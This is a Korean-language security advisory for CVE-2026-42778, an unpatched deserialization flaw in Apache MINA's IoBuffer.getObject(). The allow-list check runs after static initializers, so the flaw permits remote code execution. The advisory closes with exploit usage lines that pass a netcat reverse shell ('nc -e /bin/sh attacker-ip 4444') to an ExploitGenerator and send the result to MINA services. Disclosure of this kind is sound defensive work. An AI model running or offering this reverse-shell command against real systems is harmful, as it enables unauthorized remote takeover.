
CVE-2026-42778 EUVD-2026-26492 신뢰할 수 없는 데이터의 역직렬화 (CWE-502)
Apache MINA AbstractIoBuffer.getObject() 메서드의 불완전한 수정. 역직렬화할 수 있는 클래스를 제한하는 클래스 이름 허용 목록 검증이 너무 늦게 적용되어, 읽히는 클래스의 정적 초기화자가 이미 실행된 후에야 적용됩니다. 이는 CVE-2024-52046에 대한 원래 수정이 2.1.X 및 2.2.X 브랜치에 제대로 적용되지 않았기 때문에 발생합니다. 영향을 받는 버전: - Apache MINA 2.1.0 ~ 2.1.11 - Apache MINA 2.2.0 ~ 2.2.6
CVE ID: CVE-2026-42778
게시일: 2026-01-05
영향: 치명적
익스플로잇 공개 여부: 비공개, 비공개 전용.
CVSS: 9.8
패치 가능 여부: (아직 공식 패치 없음)
공격자는 악의적인 직렬화 객체를 제작하여 IoBuffer.getObject()가 처리할 때 클래스 이름 허용 목록 검증이 발생하기 전에 정적 초기화자를 통해 임의 코드를 실행할 수 있습니다. 이는 권한이나 사용자 상호 작용이 필요 없는 네트워크 접근 가능 취약점이므로, IoBuffer.getObject() 메서드를 호출하는 Apache MINA를 사용하는 모든 애플리케이션에서 원격 코드 실행이 가능합니다. 이 취약점은 영향을 받는 시스템의 기밀성, 무결성 및 가용성을 완전히 손상시킬 수 있습니다.
# 컴파일 및 생성
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# ObjectSerializationCodecFactory를 사용하는 MINA 기반 서비스로 네트워크를 통해 전송
# 또는 IoBuffer.getObject()를 호출하는 모든 엔드포인트